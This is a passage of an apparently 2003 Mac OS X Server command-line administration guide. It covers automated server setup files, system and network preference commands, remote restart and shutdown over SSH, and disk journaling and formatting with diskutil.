when you use the Server Assistant to set up the first server, or you can run the Server Assistant later to create the file. You can then use that first file as a template for creating configuration files for other servers. You can edit the file directly or create scripts to create customized configuration files for any number of servers that use similar hardware. To save a template configuration file during server setup: 1 In the final pane of the Server Assistant, after you review the settings, click Save As. 2 In the dialog that appears, choose Configuration File next to “Save as” and click OK. So you can later edit the file, don’t select “Save in Encrypted Format.” 3 Choose a location to save the file and click Save. LL2354.book Page 21 Monday, October 20, 2003 9:47 AM 22 Chapter 2 Installing Server Software and Finishing Basic Setup To create a template configuration file at any time after initial setup: 1 Open the Server Assistant (in /Applications/Server). 
2 In the Welcome pane, choose “Save setup information in a file or directory record” and click Continue. 3 Enter settings on the remaining panes, then, after you review the settings in the final pane, click Save As. 4 In the dialog that appears, choose Configuration File next to “Save as” and click OK. So you can later edit the file, don’t select “Save in Encrypted Format.” 5 Choose a location to save the file and click Save. Creating Customized Configuration Files from the Template File After you create a template configuration file, you can modify it directly using a text editor or write a script to automatically generate custom configuration files for a group of servers. The file uses XML format to encode the setup information. The name of an XML key reveals the setup parameter it contains. The following example shows the basic structure and contents of a configuration file for a server with the following configuration: • An administrative user named “Administrator” (short name “admin”) with a user ID of 501 and the password “secret” • A computer name and host name of “server1.company.com” • A single Ethernet network interface set to get its address from DHCP • No server services set to start automatically <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>AdminUser</key> <dict> <key>exists</key> <false/> <key>name</key> <string>admin</string> <key>password</key> <string>secret</string> <key>realname</key> <string>Administrator</string> <key>uid</key> <string>501</string> </dict> <key>ComputerName</key> <string>server1.company.com</string> LL2354.book Page 22 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 23 <key>DS</key> <dict> <key>DSClientInfo</key> <string>2 - NetInfo client - broadcast dhcp static -192.168.42.250 network</string> <key>DSClientType</key> <string>2</string> <key>DSType</key> <string>2 - directory client</string> </dict> <key>HostName</key> <string>server1.company.com</string> <key>InstallLanguage</key> <string>English</string> <key>Keyboard</key> <dict> <key>DefaultFormat</key> <string>0</string> <key>DefaultScript</key> <string>0</string> <key>ResID</key> <integer>0</integer> <key>ResName</key> <string>U.S.</string> <key>ScriptID</key> <integer>0</integer> </dict> <key>NetworkInterfaces</key> <array> <dict> <key>ActiveAT</key> <true/> <key>ActiveTCPIP</key> <true/> <key>DNSDomains</key> <array> <string>company.com</string> </array> <key>DNSServers</key> <array> <string>192.168.100.10</string> </array> <key>DeviceName</key> <string>en0</string> <key>EthernetAddress</key> <string>00:0a:93:bc:6d:1a</string> <key>PortName</key> <string>Built-in Ethernet</string> <key>Settings</key> <dict> <key>DHCPClientID</key> LL2354.book Page 23 Monday, October 20, 2003 9:47 AM 24 Chapter 2 Installing Server Software and Finishing Basic Setup <string></string> <key>Type</key> <string>DHCP Configuration</string> </dict> </dict> </array> <key>NetworkTimeProtocol</key> <dict> <key>UsingNTP</key> <false/> </dict> <key>Rendezvous</key> <dict> <key>RendezvousEnabled</key> <true/> <key>RendezvousName</key> <string>beasbe3</string> </dict> <key>SerialNumber</key> <string>a-123-bcd-456-efg-789-hij-012-klm-345-n</string> <key>ServicesAutoStart</key> <dict> <key>Apache</key> <false/> <key>File</key> <false/> <key>MacManager</key> <false/> <key>Mail</key> <false/> <key>Print</key> <false/> <key>QTSS</key> <false/> 
<key>WebDAV</key> <false/> </dict> <key>TimeZone</key> <string>US/Pacific</string> <key>VersionNumber</key> <integer>1</integer> </dict> </plist> Note: The actual contents of a configuration file depend on the hardware configuration of the computer on which it’s created. This is one reason you should start from a template configuration file created on a computer similar to those you plan to set up. LL2354.book Page 24 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 25 Naming Configuration Files The Server Assistant recognizes configuration files with these names: • MAC-address-of-server.plist • IP-address-of-server.plist • hardware-serial-number-of-server.plist • full-host-name-of-server.plist • generic.plist The Server Assistant uses the file to set up the server with the matching address, name, or serial number. If the Server Assistant cannot find a file named for a particular server, it will use the file named generic.plist. Storing a Configuration File in an Accessible Location The Server Assistant looks for configuration files in the following locations: /Volumes/vol/Auto Server Setup/ where vol is any device volume mounted in the /Volumes directory. Devices you can use to provide configuration files include • A partition on one of the server’s hard disks • An iPod • An optical (CD or DVD) drive • A USB or FireWire drive • Any other portable storage device that mounts in the /Volumes directory Changing Server Settings After initial setup, you can use a variety of commands to view or change Mac OS X Server configuration settings. For information on changing general system preferences, see Chapter 4, “Setting General System Preferences,” on page 31. For information on changing network settings, see Chapter 5, “Network Preferences,” on page 37. For information on changing service-specific settings, see the chapter that covers the service. LL2354.book Page 25 Monday, October 20, 2003 9:47 AM 26 Chapter 2 Installing Server Software and Finishing Basic Setup Viewing, Validating, and Setting the Software Serial Number You can use the serversetup command to view or set the server’s software serial number or to validate a server software serial number. The serversetup utility is located in /System/Library/ServerSetup. To display the server’s software serial number: $ serversetup -getSerialNumber To set the server software serial number: $ sudo serversetup -setSerialNumber serialnumber To validate a server software serial number: $ serversetup -verifySerialNumber serialnumber Displays 0 if the number is valid, 1 if it isn’t. Updating Server Software You can use the softwareupdate command to check for and install software updates over the web from Apple’s website. To check for available updates: $ softwareupdate --list To install an update: $ softwareupdate --install update-version To view command help: $ softwareupdate --help Parameter Description serialnumber A valid Mac OS X Server software serial number, as found on the software packaging that comes with the software. Parameter Description update-version The hyphenated product version string that appears in the list of updates when you use the --list option. LL2354.book Page 26 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 27 Moving a Server Try to place a server in its final network location (subnet) before setting it up for the first time. 
If you’re concerned about unauthorized or premature access, you can set up a firewall to protect the server while you're finalizing its configuration. If you must move a server after initial setup, you need to change settings that are sensitive to network location before the server can be used. For example, the server's IP address and host name—stored in both directories and configuration files that reside on the server—must be updated. When you move a server, consider these guidelines: • Minimize the time the server is in its temporary location so the information you need to change is limited. • Don’t configure services that depend on network settings until the server is in its final location. Such services include Open Directory replication, Apache settings (such as virtual hosts), DHCP, and other network infrastructure settings that other computers depend on. • Wait to import final user accounts. Limit accounts to test accounts so you minimize the user-specific network information (such as home directory location) that will need to change after the move. • After you move the server, use the changeip tool to change IP addresses, host names, and other data stored in Open Directory NetInfo and LDAP directories on the server. See “Changing a Server’s IP Address” on page 39. You may need to manually adjust some network configurations, such as the local DNS database, after using the tool. • Reconfigure the search policy of computers (such as user computers and DHCP servers) that have been configured to use the server in its original location. LL2354.book Page 27 Monday, October 20, 2003 9:47 AM LL2354.book Page 28 Monday, October 20, 2003 9:47 AM 3 29 3 Restarting or Shutting Down a Server Commands you can use to shut down or restart a local or remote server. Restarting a Server You can use the reboot or shutdown -r command to restart a server at a specific time. For more information, see the man pages. Examples To restart the local server: $ shutdown -r now To restart a remote server immediately: $ ssh -l root server shutdown -r now To restart a remote server at a specific time: $ ssh -l root server shutdown -r hhmm Automatic Restart You can also use the systemsetup command to set up the server to start automatically after a power failure or system freeze. See “Viewing or Changing Automatic Restart Settings” on page 33. Parameter Description server The IP address or DNS name of the server. hhmm The hour and minute when the server restarts. LL2354.book Page 29 Monday, October 20, 2003 9:47 AM 30 Chapter 3 Restarting or Shutting Down a Server Changing a Remote Server’s Startup Disk You can change a remote server’s startup disk using SSH. To change the startup disk: Log in to the remote server using SSH and type $ bless -folder "/Volumes/disk/System/Library/CoreServices" -setOF For information on using SSH to log in to a remote server, see “Sending Commands to a Remote Server” on page 16. Shutting Down a Server You can use the shutdown command to shut down a server at a specific time. For more information, see the man page. Examples To shut down a remote server immediately: $ ssh -l root server shutdown -h now To shut down the local server in 30 minutes: $ shutdown -h +30 Parameter Description disk The name of the disk that contains the desired startup volume. Parameter Description server The IP address or DNS name of the server. 
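If you manage several servers, the same remote restart command can be wrapped in a small shell script. The following is a minimal sketch, assuming root SSH login is allowed on each machine; the host names are placeholders you would replace with your own:

#!/bin/bash
# restart-servers.sh: restart a list of remote servers in sequence.
# The host names below are hypothetical examples.
for server in server1.example.com server2.example.com; do
    echo "Restarting ${server}..."
    ssh -l root "${server}" shutdown -r now
done

You're prompted for each server's root password unless you have set up SSH key-based authentication.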
LL2354.book Page 30 Monday, October 20, 2003 9:47 AM 4 31 4 Setting General System Preferences Commands you can use to set system preferences, usually set using the System Preferences GUI application. Computer Name You can use the systemsetup command to view or change a server’s computer name (the name used to browse for AFP share points on the server), which would otherwise be set using the Sharing pane of System Preferences. Viewing or Changing the Computer Name To display the server’s computer name: $ sudo systemsetup -getcomputername or $ sudo networksetup -getcomputername To change the computer name: $ sudo systemsetup -setcomputername computername or $ sudo networksetup -setcomputername computername Date and Time You can use the systemsetup or serversetup command to view or change: • A server’s system date or time • A server’s time zone • Whether a server uses a network time server These settings would otherwise be changed using the Date & Time pane of System Preferences. LL2354.book Page 31 Monday, October 20, 2003 9:47 AM 32 Chapter 4 Setting General System Preferences Viewing or Changing the System Date To view the current system date: $ sudo systemsetup -getdate or $ serversetup -getDate To set the current system date: $ sudo systemsetup -setdate mm:dd:yy or $ sudo serversetup -setDate mm/dd/yy Viewing or Changing the System Time To view the current system time: $ sudo systemsetup -gettime or $ serversetup -getTime To change the current system time: $ sudo systemsetup -settime hh:mm:ss or $ sudo serversetup -setTime hh:mm:ss Viewing or Changing the System Time Zone To view the current time zone: $ sudo systemsetup -gettimezone or $ serversetup -getTimeZone To view the available time zones: $ sudo systemsetup -listtimezones To change the system time zone: $ sudo systemsetup -settimezone timezone or $ sudo serversetup -setTimeZone timezone LL2354.book Page 32 Monday, October 20, 2003 9:47 AM Chapter 4 Setting General System Preferences 33 Viewing or Changing Network Time Server Usage To see if a network time server is being used: $ sudo systemsetup -getusingnetworktime To enable or disable use of a network time server: $ sudo systemsetup -setusingnetworktime (on|off) To view the current network time server: $ sudo systemsetup -getnetworktimeserver To specify a network time server: $ sudo systemsetup -setnetworktimeserver timeserver Energy Saver Settings You can use the systemsetup command to view or change a server’s energy saver settings, which would otherwise be set using the Energy Saver pane of System Preferences. 
Viewing or Changing Sleep Settings To view the idle time before sleep: $ sudo systemsetup -getsleep To set the idle time before sleep: $ sudo systemsetup -setsleep minutes To see if the system is set to wake for modem activity: $ sudo systemsetup -getwakeonmodem To set the system to wake for modem activity: $ sudo systemsetup -setwakeonmodem (on|off) To see if the system is set to wake for network access: $ sudo systemsetup -getwakeonnetworkaccess To set the system to wake for network access: $ sudo systemsetup -setwakeonnetworkaccess (on|off) Viewing or Changing Automatic Restart Settings To see if the system is set to restart after a power failure: $ sudo systemsetup -getrestartpowerfailure To set the system to restart after a power failure: $ sudo systemsetup -setrestartpowerfailure (on|off) To see how long the system waits to restart after a power failure: $ sudo systemsetup -getWaitForStartupAfterPowerFailure LL2354.book Page 33 Monday, October 20, 2003 9:47 AM 34 Chapter 4 Setting General System Preferences To set how long the system waits to restart after a power failure: $ sudo systemsetup -setWaitForStartupAfterPowerFailure seconds To see if the system is set to restart after a system freeze: $ sudo systemsetup -getrestartfreeze To set the system to restart after a system freeze: $ sudo systemsetup -setrestartfreeze (on|off) Power Management Settings You can use the pmset command to change a variety of power management settings, including: • Display dim timer • Disk spindown timer • System sleep timer • Wake on network activity • Wake on modem activity • Restart after power failure • Dynamic processor speed change • Reduce processor speed • Sleep computer on power button press For more information, see the pmset man page. Startup Disk Settings You can use the systemsetup command to view or change a server’s computer startup disk, which would otherwise be set using the Startup Disk pane of System Preferences. Viewing or Changing the Startup Disk To view the current startup disk: $ sudo systemsetup -getstartupdisk To view the available startup disks: $ sudo systemsetup -liststartupdisks To change the current startup disk: $ sudo systemsetup -setstartupdisk path Parameter Description seconds Must be a multiple of 30 seconds. LL2354.book Page 34 Monday, October 20, 2003 9:47 AM Chapter 4 Setting General System Preferences 35 Sharing Settings You can use the systemsetup command to view or change settings that would otherwise be set using the Sharing pane of System Preferences. Viewing or Changing Remote Login Settings You can use SSH to log in to a remote server if remote login is enabled. To see if the system is set to allow remote login: $ sudo systemsetup -getremotelogin To enable or disable remote login: $ sudo systemsetup -setremotelogin (on|off) or $ serversetup -enableSSH Telnet access is disabled by default because it isn’t as secure as SSH. You can, however, enable Telnet access. See “Using Telnet” on page 18. Viewing or Changing Apple Event Response To see if the system is set to respond to remote events: $ sudo systemsetup -getremoteappleevents To set the server to respond to remote events: $ sudo systemsetup -setremoteappleevents (on|off) International Settings You can use the serversetup command to view or change language settings that would otherwise be set using the Sharing pane of System Preferences. 
Viewing or Changing Language Settings To view the current primary language: $ serversetup -getPrimaryLanguage To view the installed primary language: $ serversetup -getInstallLanguage To change the install language: $ sudo serversetup -setInstallLanguage language To view the script setting: $ serversetup -getPrimaryScriptCode LL2354.book Page 35 Monday, October 20, 2003 9:47 AM 36 Chapter 4 Setting General System Preferences Login Settings Disabling the Restart and Shutdown Buttons To disable or enable the Restart and Shutdown buttons in the login dialog: $ sudo serversetup -setDisableRestartShutdown (0|1) 0 disables the buttons. 1 enables the buttons. To view the current setting: $ serversetup -getDisableRestartShutdown LL2354.book Page 36 Monday, October 20, 2003 9:47 AM 5 37 5 Network Preferences Commands you can use to change a server’s network settings. Network Interface Information This section describes commands you address to a specific hardware device (for example, en0) or port (for example, Built-in Ethernet). If you prefer to work with network port configurations following the approach used in the Network preferences pane of System Preferences, see the commands in “Network Port Configurations” on page 38. Viewing Port Names and Hardware Addresses To list all port names: $ serversetup -getAllPort To list all port names with their Ethernet (MAC) addresses: $ sudo networksetup -listallhardwareports To list hardware port information by port configuration: $ sudo networksetup -listallnetworkservices An asterisk in the results (*) marks an inactive configuration. To view the default (en0) Ethernet (MAC) address of the server: $ serversetup -getMacAddress To view the Ethernet (MAC) address of a particular port: $ sudo networksetup -getmacaddress (devicename|"portname") To scan for new hardware ports: $ sudo networksetup -detectnewhardware This command checks the computer for new network hardware and creates a default configuration for each new port. LL2354.book Page 37 Monday, October 20, 2003 9:47 AM 38 Chapter 5 Network Preferences Viewing or Changing MTU Values You can use these commands to change the maximum transmission unit (MTU) size for a port. To view the MTU value for a hardware port: $ sudo networksetup -getMTU (devicename|"portname") To list valid MTU values for a hardware port: $ sudo networksetup -listvalidMTUrange (devicename|"portname") To change the MTU value for a hardware port: $ sudo networksetup -setMTU (devicename|"portname") Viewing or Changing Media Settings To view the media settings for a port: $ sudo networksetup -getMedia (devicename|"portname") To list valid media settings for a port: $ sudo networksetup -listValidMedia (devicename|"portname") To change the media settings for a port: $ sudo networksetup -setMedia (devicename|"portname") subtype [option1] [option2] [...] Network Port Configurations Network port configurations are sets of network preferences that can be assigned to a particular network interface and then enabled or disabled. The Network pane of System Preferences stores and displays network settings as port configurations. 
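For example, using the commands described in the sections that follow, you can script the creation and activation of a port configuration. A brief sketch, in which the configuration name and hardware port are hypothetical and should be adjusted for your hardware:
$ sudo networksetup -createnetworkservice "Test LAN" "Built-in Ethernet"
$ sudo networksetup -setnetworkserviceenabled "Test LAN" on
$ sudo networksetup -listallnetworkservices
The last command lists all configurations so you can confirm the new one exists and is active.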
Creating or Deleting Port Configurations To list existing port configuration: $ sudo networksetup -listallnetworkservices To create a port configuration: $ sudo networksetup -createnetworkservice configuration hardwareport To duplicate a port configuration: $ sudo networksetup -duplicatenetworkservice configuration newconfig To rename a port configuration: $ sudo networksetup -renamenetworkservice configuration newname To delete a port configuration: $ sudo networksetup -removenetworkservice configuration Activating Port Configurations To see if a port configuration is on: $ sudo networksetup -getnetworkserviceenabled configuration LL2354.book Page 38 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 39 To enable or disable a port configuration: $ sudo networksetup -setnetworkserviceenabled configuration (on|off) Changing Configuration Precedence To list the configuration order: $ sudo networksetup -listnetworkserviceorder The configurations are listed in the order that they’re tried when a network connection is established. An asterisk (*) marks an inactive configuration. To change the order of the port configurations: $ sudo networksetup -ordernetworkservices config1 config2 [config3] [...] TCP/IP Settings Changing a Server’s IP Address Changing a server’s IP address isn’t as simple as changing the TCP/IP settings. Address information is set throughout the system when you set up the server. To make sure that all the necessary changes are made, use the changeip command. To change a server’s IP address: 1 Run the changeip tool: $ changeip [(directory|-)] old-ip new-ip [old-hostname new-hostname] For more information or examples, see the man page. 2 Use the networksetup or serversetup command (or the Network pane of System Preferences) to change the server’s IP address in its network settings. 3 Restart the server. Parameter Description directory If the server is an Open Directory master or replica, or is connected to a directory system, you must include the path to the directory domain (directory node). For a standalone server, type “-” instead. old-ip The current IP address. new-ip The new IP address. old-hostname (optional) The current DNS host name of the server. new-hostname (optional) The new DNS host name of the server. LL2354.book Page 39 Monday, October 20, 2003 9:47 AM 40 Chapter 5 Network Preferences Viewing or Changing IP Address, Subnet Mask, or Router Address You can use the serversetup and networksetup commands to change a computer’s TCP/IP settings. Important: Changing a server’s IP address isn’t as simple as changing the TCP/IP settings. You must first run the changeip utility to make sure necessary changes are made throughout the system. See “Changing a Server’s IP Address” on page 39. 
To list TCP/IP settings for a configuration: $ sudo networksetup -getinfo "configuration" Example: $ networksetup -getinfo "Built-In Ethernet" Manual Configuration IP Address: 192.168.10.12 Subnet mask: 255.255.0.0 Router: 192.18.10.1 Ethernet Address: 1a:2b:3c:4d:5e:6f To view TCP/IP settings for port en0: $ serversetup -getDefaultinfo (devicename|"portname") To view TCP/IP settings for a particular port or device: $ serversetup -getInfo (devicename|"portname") To change TCP/IP settings for a particular port or device: $ sudo serversetup -setInfo (devicename|"portname") ipaddress subnetmask router To set manual TCP/IP information for a configuration: $ sudo networksetup -setmanual "configuration" ipaddress subnetmask router To validate an IP address: $ serversetup -isValidIPAddress ipaddress Displays 0 if the address is valid, 1 if it isn’t. To validate a subnet mask: $ serversetup -isValidSubnetMask subnetmask To set a configuration to use DHCP: $ sudo networksetup -setdhcp "configuration" [clientID] To set a configuration to use DHCP with a manual IP address: $ sudo networksetup -setmanualwithdhcprouter "configuration" ipaddress To set a configuration to use BootP: $ sudo networksetup -setbootp "configuration" LL2354.book Page 40 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 41 Viewing or Changing DNS Servers To view the DNS servers for port en0: $ serversetup -getDefaultDNSServer (devicename|"portname") To change the DNS servers for port en0: $ sudo serversetup -setDefaultDNSServer (devicename|"portname") server1 [server2] [...] To view the DNS servers for a particular port or device: $ serversetup -getDNSServer (devicename|"portname") To change the DNS servers for a particular port or device: $ sudo serversetup -setDNSServer (devicename|"portname") server1 [server2] [...] To list the DNS servers for a configuration: $ sudo networksetup -getdnsservers "configuration" To view the DNS search domains for port en0: $ serversetup -getDefaultDNSDomain (devicename|"portname") To change the DNS search domains for port en0: $ sudo serversetup -setDefaultDNSDomain (devicename|"portname") domain1 [domain2] [...] To view the DNS search domains for a particular port or device: $ serversetup -getDNSDomain (devicename|"portname") To change the DNS search domains for a particular port or device: $ sudo serversetup -setDNSDomain (devicename|"portname") domain1 [domain2] [...] To list the DNS search domains for a configuration: $ sudo networksetup -getsearchdomains "configuration" To set the DNS servers for a configuration: $ sudo networksetup -setdnsservers "configuration" dns1 [dns2] [...] To set the search domains for a configuration: $ sudo networksetup -setsearchdomains "configuration" domain1 [domain2] [...] To validate a DNS server: $ serversetup -verifyDNSServer server1 [server2] [...] To validate DNS search domains: $ serversetup -verifyDNSDomain domain1 [domain2] [...] LL2354.book Page 41 Monday, October 20, 2003 9:47 AM 42 Chapter 5 Network Preferences Enabling TCP/IP To enable TCP/IP on a particular port: $ serversetup -EnableTCPIP [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. To disable TCP/IP on a particular port: $ serversetup -DisableTCPIP [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. AppleTalk Settings Enabling and Disabling AppleTalk To enable AppleTalk on a particular port: $ serversetup -EnableAT [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. 
To disable AppleTalk on a particular port: $ serversetup -DisableAT [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. To enable AppleTalk on en0: $ serversetup -EnableDefaultAT To disable AppleTalk on en0: $ serversetup -DisableDefaultAT To make AppleTalk active or inactive for a configuration: $ sudo networksetup -setappletalk "configuration" (on|off) To check AppleTalk state on en0: $ serversetup -getDefaultATActive To see if AppleTalk is active for a configuration: $ sudo networksetup -getappletalk Proxy Settings Viewing or Changing FTP Proxy Settings To view the FTP proxy information for a configuration: $ sudo networksetup -getftpproxy "configuration" To set the FTP proxy information for a configuration: $ sudo networksetup -setftpproxy "configuration" domain portnumber LL2354.book Page 42 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 43 To view the FTP passive setting for a configuration: $ sudo networksetup -getpassiveftp "configuration" To enable or disable FTP passive mode for a configuration: $ sudo networksetup -setpassiveftp "configuration" (on|off) To enable or disable the FTP proxy for a configuration: $ sudo networksetup -setftpproxystate "configuration" (on|off) Viewing or Changing Web Proxy Settings To view the web proxy information for a configuration: $ sudo networksetup -getwebproxy "configuration" To set the web proxy information for a configuration: $ sudo networksetup -setwebproxy "configuration" domain portnumber To enable or disable the web proxy for a configuration: $ sudo networksetup -setwebproxystate "configuration" (on|off) Viewing or Changing Secure Web Proxy Settings To view the secure web proxy information for a configuration: $ sudo networksetup -getsecurewebproxy "configuration" To set the secure web proxy information for a configuration: $ sudo networksetup -setsecurewebproxy "configuration" domain portnumber To enable or disable the secure web proxy for a configuration: $ sudo networksetup -setsecurewebproxystate "configuration" (on|off) Viewing or Changing Streaming Proxy Settings To view the streaming proxy information for a configuration: $ sudo networksetup -getstreamingproxy "configuration" To set the streaming proxy information for a configuration: $ sudo networksetup -setstreamingproxy "configuration" domain portnumber To enable or disable the streaming proxy for a configuration: $ sudo networksetup -setstreamingproxystate "configuration" (on|off) Viewing or Changing Gopher Proxy Settings To view the gopher proxy information for a configuration: $ sudo networksetup -getgopherproxy "configuration" To set the gopher proxy information for a configuration: $ sudo networksetup -setgopherproxy "configuration" domain portnumber To enable or disable the gopher proxy for a configuration: $ sudo networksetup -setgopherproxystate "configuration" (on|off) LL2354.book Page 43 Monday, October 20, 2003 9:47 AM 44 Chapter 5 Network Preferences Viewing or Changing SOCKS Firewall Proxy Settings To view the SOCKS firewall proxy information for a configuration: $ sudo networksetup -getsocksfirewallproxy "configuration" To set the SOCKS firewall proxy information for a configuration: $ sudo networksetup -setsocksfirewallproxy "configuration" domain portnumber To enable or disable the SOCKS firewall proxy for a configuration: $ sudo networksetup -setsocksfirewallproxystate "configuration" (on|off) Viewing or Changing Proxy Bypass Domains To list the proxy bypass domains for a configuration: $ sudo networksetup 
-getproxybypassdomains "configuration" To set the proxy bypass domains for a configuration: $ sudo networksetup -setproxybypassdomains "configuration" [domain1] domain2 [...] AirPort Settings Viewing or Changing Airport Settings To see if AirPort power is on or off: $ sudo networksetup -getairportpower To turn AirPort power on or off: $ sudo networksetup -setairportpower (on|off) To display the name of the current AirPort network: $ sudo networksetup -getairportnetwork To join an AirPort network: $ sudo networksetup -setairportnetwork network [password] Computer, Host, and Rendezvous Name Viewing or Changing the Computer Name To display the server’s computer name: $ sudo systemsetup -getcomputername or $ sudo networksetup -getcomputername or $ serversetup -getComputername LL2354.book Page 44 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 45 To change the computer name: $ sudo systemsetup -setcomputername computername or $ sudo networksetup -setcomputername computername or $ sudo serversetup -setComputername computername To validate a computer name: $ serversetup -verifyComputername computername Viewing or Changing the Local Host Name To display the server’s local host name: $ serversetup -getHostname To change the server’s local host name: $ sudo serversetup -setHostname hostname Viewing or Changing the Rendezvous Name To display the server’s Rendezvous name: $ serversetup -getRendezvousname To change the server’s Rendezvous name: $ sudo serversetup -setRendezvousname rendezvousname The command displays a 0 if the name was changed. Note: If you use the Server Admin GUI application to connect to a server using its Rendezvous name, then change the server’s Rendezvous name, you will need to reconnect to the server the next time you open the Server Admin application. LL2354.book Page 45 Monday, October 20, 2003 9:47 AM LL2354.book Page 46 Monday, October 20, 2003 9:47 AM 6 47 6 Working With Disks and Volumes Commands you can use to prepare, use, and test disks and volumes. Mounting and Unmounting Volumes You can use the mount_afp command to mount an AFP volume. For more information, type man mount_afp to see the man page. Mounting Volumes You can use the mount command with parameters appropriate to the type of file system you want to mount, or use one of these file-system-specific mount commands: • mount_afp for Apple File Protocol (AppleShare) volumes • mount_cd9660 for ISO 9660 volumes • mount_cddafs for CD Digital Audio format (CDDA) volumes • mount_hfs for Apple Hierarchical File System (HFS) volumes • mount_msdos for PC MS-DOS volumes • mount_nfs for Network File System (NFS) volumes • mount_smbfs for Server Message Block (SMB) volumes • mount_udf for Universal Disk Format (UDF) volumes • mount_webdav for Web-based Distributed Authoring and Versioning (WebDAV) volumes For more information, see the related man pages. Unmounting Volumes You can use the umount command to unmount a volume. For more information, see the man page. Checking for Disk Problems You can use the diskutil or fsck command (fsck_hfs for HFS volumes) to check the physical condition and file system integrity of a volume. For more information, see the related man pages. LL2354.book Page 47 Monday, October 20, 2003 9:47 AM 48 Chapter 6 Working With Disks and Volumes Monitoring Disk Space When you need more vigilant monitoring of disk space than the log rolling scripts provide, you can use the diskspacemonitor command-line tool. 
It lets you monitor disk space and take action more frequently than once a day when disk space is critically low, and gives you the opportunity to provide your own action scripts. diskspacemonitor is disabled by default. You can enable it by opening a Terminal window and typing sudo diskspacemonitor on. You may be prompted for your password. Type man diskspacemonitor for more information about the command- line options. When enabled, diskspacemonitor uses information in a configuration file to determine when to execute alert and recovery scripts for reclaiming disk space: • The configuration file is /etc/diskspacemonitor/diskspacemonitor.conf. It lets you specify how often you want to monitor disk space and thresholds to use for determining when to take the actions in the scripts. By default, disks are checked every 10 minutes, an alert script executed when disks are 75% full, and a recovery script executed when disks are 85% full. To edit the configuration file, log in to the server as an administrator and use a text editor to open the file. See the comments in the file for additional information. • By default, two predefined action scripts are executed when the thresholds are reached. The default alert script is /etc/diskspacemonitor/action/alert. It runs in accord with instructions in configuration file /etc/diskspacemonitor/alert.conf. It sends email to recipients you specify. The default recovery script is /etc/diskspacemonitor/action/recover. It runs in accord with instructions in configuration file /etc/diskspacemonitor/recover.conf. See the comments in the script and configuration files for more information about these files. • If you want to provide your own alert and recovery scripts, you can. Put your alert script in /etc/diskspacemonitor/action/alert.local and your recovery script in /etc/diskspacemonitor/action/recovery.local. Your scripts will be executed before the default scripts when the thresholds are reached. To configure the scripts on a server from a remote Mac OS X computer, open a Terminal window and log in to the remote server using SSH. LL2354.book Page 48 Monday, October 20, 2003 9:47 AM Chapter 6 Working With Disks and Volumes 49 Reclaiming Disk Space Using Log Rolling Scripts Three predefined scripts are executed automatically to reclaim space used on your server for log files generated by • Apple file service • Windows service • Web service • Web performance cache • Mail service • Print service The scripts use values in the following configuration files to determine whether and how to reclaim space: • The script /etc/periodic/daily/600.daily.server runs daily. Its configuration file is /etc/diskspacemonitor/daily.server.conf. • The script /etc/periodic/weekly/600.weekly.server is intended to run weekly, but is currently empty. Its configuration file is /etc/diskspacemonitor/weekly.server.conf. • The script /etc/periodic/monthly/600.monthly.server is intended to run monthly, but is currently empty. Its configuration file is /etc/diskspacemonitor/monthly.server.conf. As configured, the scripts specify actions that complement the log file management performed by the services listed above, so don’t modify them. 
All you need to do is log in as an administrator and use a text editor to define thresholds in the configuration files that determine when the actions are taken:
• the number of megabytes a log file must contain before its space is reclaimed
• the number of days since a log file's last modification that need to pass before its space is reclaimed
Specify one or both thresholds. The actions are taken when either threshold is exceeded. There are several additional parameters you can specify. Refer to comments in the configuration files for information about all the parameters and how to set them. The scripts ignore all log files except those for which at least one threshold is present in the configuration file.
To configure the scripts on a server from a remote Mac OS X computer, open a Terminal window and log in to the remote server using SSH. Then open a text editor and edit the scripts.
You can also use the diskspacemonitor command-line tool to reclaim disk space.

Managing Disk Journaling

Checking to See if Journaling is Enabled
You can use the mount command to see if journaling is enabled on a volume.
To see if journaling is enabled:
$ mount
Look for journaled in the attributes in parentheses following a volume. For example:
/dev/disk0s9 on / (local, journaled)

Turning on Journaling for an Existing Volume
You can use the diskutil command to enable journaling on a volume without affecting existing files on the volume.
Important: Always check the volume for disk errors using the fsck_hfs command before you turn on journaling.
To enable journaling:
$ diskutil enableJournal volume
Parameter: volume: The volume name or device name of the volume.
Example
$ mount
/dev/disk0s9 on / (local, journaled)
/dev/disk0s10 on /Volumes/OS 9.2.2 (local)
$ sudo fsck_hfs /dev/disk0s10
** /dev/rdisk0s10
** Checking HFS plus volume.
** Checking extents overflow file.
** Checking Catalog file.
** Checking Catalog hierarchy.
** Checking volume bitmap.
** Checking volume information.
** The volume OS 9.2.2 appears to be OK.
$ diskutil enableJournal /dev/disk0s10
Allocated 8192K for journal file.
Journaling has been enabled on /dev/disk0s10
$ mount
/dev/disk0s9 on / (local, journaled)
/dev/disk0s10 on /Volumes/OS 9.2.2 (local, journaled)

Enabling Journaling When You Erase a Disk
You can use the newfs_hfs command to set up and enable journaling when you erase a disk.
To enable journaling when erasing a disk:
$ newfs_hfs -J -v volname device
Parameters:
volname: The name you want the new disk volume to have.
device: The device name of the disk.

Disabling Journaling
To disable journaling:
$ diskutil disableJournal volume
Parameter: volume: The volume name or device name of the volume.

Erasing, Partitioning, and Formatting Disks
You can use the diskutil command to partition, erase, or format a disk. For more information, see the man page.

Setting Up a Case-Sensitive HFS+ File System
You can use the diskutil tool to format a drive for case-sensitive HFS+.
Note: Volumes you format as case-sensitive HFS+ are also journaled.
To format a Mac OS Extended volume as case-sensitive HFS+:
$ sudo diskutil eraseVolume "Case-sensitive HFS+" newvolname volume
Parameters:
newvolname: The name given to the reformatted, case-sensitive volume.
volume: The path to the existing volume to be reformatted. For example, /Volumes/HFSPlus
For more information, see the man page for diskutil.
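As a concrete illustration, reformatting a hypothetical scratch volume mounted at /Volumes/Scratch under the new name CaseSensitive might look like the following (both names are illustrative, and the command erases the volume's existing contents):
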